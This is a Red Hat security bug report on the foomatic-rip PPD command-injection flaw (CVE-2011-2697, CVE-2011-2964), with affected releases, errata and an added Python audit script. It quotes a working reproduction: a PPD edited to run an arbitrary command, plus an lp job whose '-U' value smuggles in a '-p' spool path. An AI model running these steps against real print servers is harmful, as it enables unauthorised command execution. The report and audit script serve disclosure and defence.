Bug 721001 (CVE-2011-2697)
| Field | Value | Field | Value |
|---|---|---|---|
| Summary: | CVE-2011-2697 foomatic: Improper sanitization of command line option in foomatic-rip | | |
| Product: | [Other] Security Response | Reporter: | Jan Lieskovsky <jlieskov> |
| Component: | vulnerability | Assignee: | Red Hat Product Security <security-response-team> |
| Status: | CLOSED ERRATA | QA Contact: | |
| Severity: | medium | Docs Contact: | |
| Priority: | medium | | |
| Version: | unspecified | CC: | jpopelka, twaugh, vdanen |
| Target Milestone: | --- | Keywords: | Security |
| Target Release: | --- | | |
| Hardware: | All | | |
| OS: | Linux | | |
| Whiteboard: | | | |
| Fixed In Version: | | Doc Type: | Bug Fix |
| Doc Text: | | Story Points: | --- |
| Clone Of: | | Environment: | |
| Last Closed: | 2011-08-01 16:00:55 UTC | Type: | --- |
| Regression: | --- | Mount Type: | --- |
| Documentation: | --- | CRM: | |
| Verified Versions: | | Category: | --- |
| oVirt Team: | --- | RHEL 7.3 requirements from Atomic Host: | |
| Cloudforms Team: | --- | Target Upstream Version: | |
| Embargoed: | | | |
| Bug Depends On: | 725631, 725632, 725633, 833897 | | |
| Bug Blocks: | 721067 | | |
| Attachments: | | | |
Description
Jan Lieskovsky
2011-07-13 14:18:58 UTC
Created attachment 512673 [details]
Local copy of "enhanced patch from upstream for the current C code foomatic-rip" (#c24 in Novell bugzilla) patch
Created attachment 512674 [details]
Local copy of "enhanced patch from upstream for the older foomatic-rip Perl script" (#c25 in Novell bugzilla) patch
This issue affects the versions of the foomatic package, as shipped with Red Hat Enterprise Linux 4, 5, and 6.

--

This issue affects the versions of the foomatic package, as shipped with Fedora release of 14 and 15. Please schedule an update.

Created foomatic tracking bugs for this issue

Affects: fedora-all [bug 721008]

Further detail from Novell bugzilla [1] how to reproduce the issue (scenario would need to be modified a bit though, to successfully apply to foomatic-rip versions, shipped across Red Hat products):

==============================================================================
How to reproduce with foomatic-rip:

1. Set up a queue which uses foomatic-rip, i.e. use a PPD which has an "*cupsFilter: ... foomatic-rip" entry:

    # lpadmin -p testy2 -v file:/dev/null \
      -P /usr/share/cups/model/OpenPrintingPPDs/ghostscript/Generic-PCL_5c_Printer.ljet4.ppd.gz \
      -E

   If you don't have openSUSE 11.4, the Generic-PCL_5c_Printer.ljet4.ppd.gz is located in /usr/share/cups/model/Generic/PCL_5c_Printer-ljet4.ppd.gz

2. Get the PPD as normal user:

    $ wget http://localhost:631/printers/testy2.ppd
    ...
    2011-06-07 12:38:59 (795 MB/s) - `testy2.ppd' saved [13829/13829]

3. Modify the PPD as normal user: change the *FoomaticRIPCommandLine: entry (up to the *End line) as one likes, e.g. to this single line (without *End line):

    *FoomaticRIPCommandLine: "/bin/cp /etc/SuSE-release /tmp/testy2.out"

4. Print a dummy job to find out the current job id as normal user:

    $ echo Hello | lp -d testy2
    request id is testy2-111

5. Print the malicious job as normal user:

    $ lp -d testy -U'-p/var/spool/cups/d00112-001' \
      -o document-format=text/plain testy2.ppd
    request id is testy-112

6. Verify that the FoomaticRIPCommandLine was actually executed:

    # ls -l /tmp/testy2.out
    -rw------- 1 lp lp 57 Jun 7 12:40 /tmp/testy2.out
    # cat /tmp/testy2.out
    openSUSE 11.4 (x86_64)
    VERSION = 11.4
    CODENAME = Celadon
==============================================================================

And one correction regarding point 5. yet:

How to reproduce with foomatic-rip:
...
5. Print the malicious job as normal user:

    $ lp -d testy2 -U'-p/var/spool/cups/d00112-001' \
      -o document-format=text/plain testy2.ppd
    request id is testy2-112

The CVE identifier of CVE-2011-2697 has been assigned to this issue:
http://www.openwall.com/lists/oss-security/2011/07/18/3

Created attachment 515184 [details]
ppd containing cupsFilter
MITRE has assigned two CVE names here:

Common Vulnerabilities and Exposures assigned an identifier CVE-2011-2697 to the following vulnerability:

Name: CVE-2011-2697
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2697
Assigned: 20110711
Reference: http://www.openwall.com/lists/oss-security/2011/07/13/3
Reference: http://www.openwall.com/lists/oss-security/2011/07/18/3
Reference: http://www.openwall.com/lists/oss-security/2011/07/28/1
Reference: https://bugzilla.novell.com/show_bug.cgi?id=698451
Reference: https://bugzilla.redhat.com/show_bug.cgi?id=721001

foomatic-rip-hplip in HP Linux Imaging and Printing (HPLIP) 3.11.5 allows remote attackers to execute arbitrary code via a crafted *FoomaticRIPCommandLine field in a .ppd file.

Common Vulnerabilities and Exposures assigned an identifier CVE-2011-2964 to the following vulnerability:

Name: CVE-2011-2964
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2964
Assigned: 20110729
Reference: http://www.openwall.com/lists/oss-security/2011/07/13/3
Reference: http://www.openwall.com/lists/oss-security/2011/07/18/3
Reference: http://www.openwall.com/lists/oss-security/2011/07/28/1
Reference: https://bugzilla.novell.com/show_bug.cgi?id=698451
Reference: https://bugzilla.redhat.com/show_bug.cgi?id=721001

foomaticrip.c in foomatic-rip in foomatic-filters in Foomatic 4.0.6 allows remote attackers to execute arbitrary code via a crafted *FoomaticRIPCommandLine field in a .ppd file, a different vulnerability than CVE-2011-2697.

Looking at the description of the CVEs from above:

CVE-2011-2697 is for the perl version in foomatic 3.x:
Affects: rhel-4, rhel-5

CVE-2011-2964 is for the C version in foomatic 4.x:
Affects: rhel-6, Fedora

Keeping this bug for the perl issue.

This issue has been addressed in following products:

  Red Hat Enterprise Linux 4
  Red Hat Enterprise Linux 5

Via RHSA-2011:1109 https://rhn.redhat.com/errata/RHSA-2011-1109.html
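The root cause described in this bug is that foomatic-rip executes the *FoomaticRIPCommandLine field of whatever PPD the job hands it, so a PPD that a user can edit becomes a command line run as the `lp` user. The audit script below is an added example, not code from foomatic or from this bug report: it extracts that field from a PPD (both the single-line form and the multi-line form closed by an `*End` line, as the report describes) and reports every program the command line would run that is not on an allow-list of expected renderer programs. The allow-list `ALLOWED_PROGRAMS` and the two sample PPDs are constructed for the example; the tampered sample reuses the command line from the reproduction steps above so the check is shown catching it. A print administrator could run this over `/etc/cups/ppd/` or over a PPD before handing it to `lpadmin`.

```python
"""Audit the *FoomaticRIPCommandLine of PPD files against an allow-list.

Added example for the issue tracked as CVE-2011-2697 / CVE-2011-2964:
foomatic-rip ran the command line carried in a user-supplied PPD. This
script does not fix foomatic-rip; it flags PPDs whose command line invokes
programs outside a list of known renderers, as a review aid for PPDs that
are about to be installed.
"""
import re
import shlex
from typing import Dict, List, Optional

# Hypothetical allow-list: programs a renderer command line is expected to run.
# Extend it to match the drivers actually installed on the print server.
ALLOWED_PROGRAMS = {"gs", "cat", "pstops", "foo2zjs", "pnmtops"}

# Shell operators that start a new command stage: "||", "&&", "|", ";"
_STAGE_SPLIT = re.compile(r"\s*(?:\|\||&&|\||;)\s*")


def extract_command_line(ppd_text: str) -> Optional[str]:
    """Return the *FoomaticRIPCommandLine value, or None if the PPD has none.

    Handles the single-line form ("...") and the multi-line form, where the
    quoted value continues on following lines until a line reading *End.
    """
    lines = ppd_text.splitlines()
    for i, line in enumerate(lines):
        if not line.startswith("*FoomaticRIPCommandLine:"):
            continue
        value = line.split(":", 1)[1].strip()
        if len(value) > 1 and value.startswith('"') and value.endswith('"'):
            return value[1:-1]                       # single-line form
        parts = [value.lstrip('"')]                  # multi-line form
        for cont in lines[i + 1:]:
            if cont.strip() == "*End":
                break
            parts.append(cont)
        return "\n".join(parts).rstrip().rstrip('"')
    return None


def programs_in(command_line: str) -> List[str]:
    """Base name of the program that each pipeline/sequence stage invokes.

    Heuristic: foomatic command lines may use subshells and option
    placeholders such as %A, so this is an aid for review, not a parser of
    every shell construct.
    """
    programs = []
    for stage in _STAGE_SPLIT.split(command_line.replace("\n", " ")):
        stage = stage.strip().strip("()").strip()
        if not stage:
            continue
        try:
            tokens = shlex.split(stage)
        except ValueError:                           # unbalanced quotes
            tokens = stage.split()
        if tokens:
            programs.append(tokens[0].rsplit("/", 1)[-1])
    return programs


def audit_ppd(ppd_text: str, allowed=ALLOWED_PROGRAMS) -> Dict[str, object]:
    """Report the command line, the programs it runs, and any not allowed."""
    cmd = extract_command_line(ppd_text)
    if cmd is None:
        return {"command_line": None, "programs": [], "disallowed": [], "ok": True}
    progs = programs_in(cmd)
    bad = [p for p in progs if p not in allowed]
    return {"command_line": cmd, "programs": progs, "disallowed": bad, "ok": not bad}


# Constructed sample: a Ghostscript renderer line in the multi-line *End form.
BENIGN_PPD = """\
*PPD-Adobe: "4.3"
*cupsFilter: "application/vnd.cups-postscript 0 foomatic-rip"
*FoomaticRIPCommandLine: "gs -q -dBATCH -dPARANOIDSAFER -dNOPAUSE -sDEVICE=ljet4
 -sOutputFile=- - | cat"
*End
"""

# Constructed sample modelled on step 3 of the report: the renderer line
# replaced by a plain copy command.
TAMPERED_PPD = """\
*PPD-Adobe: "4.3"
*cupsFilter: "application/vnd.cups-postscript 0 foomatic-rip"
*FoomaticRIPCommandLine: "/bin/cp /etc/SuSE-release /tmp/testy2.out"
"""

if __name__ == "__main__":
    import sys
    paths = sys.argv[1:]
    samples = [(p, open(p, encoding="utf-8", errors="replace").read()) for p in paths]
    if not samples:
        samples = [("benign-sample", BENIGN_PPD), ("tampered-sample", TAMPERED_PPD)]
    for name, text in samples:
        report = audit_ppd(text)
        status = "ok" if report["ok"] else "DISALLOWED " + ", ".join(report["disallowed"])
        print(f"{name}: {status} (programs: {report['programs']})")
```

Run with one or more PPD paths to audit real files, or with no arguments to audit the two embedded samples. The multi-line handling matters: a PPD whose command line is split across continuation lines up to `*End` would otherwise be reported as running only the first fragment.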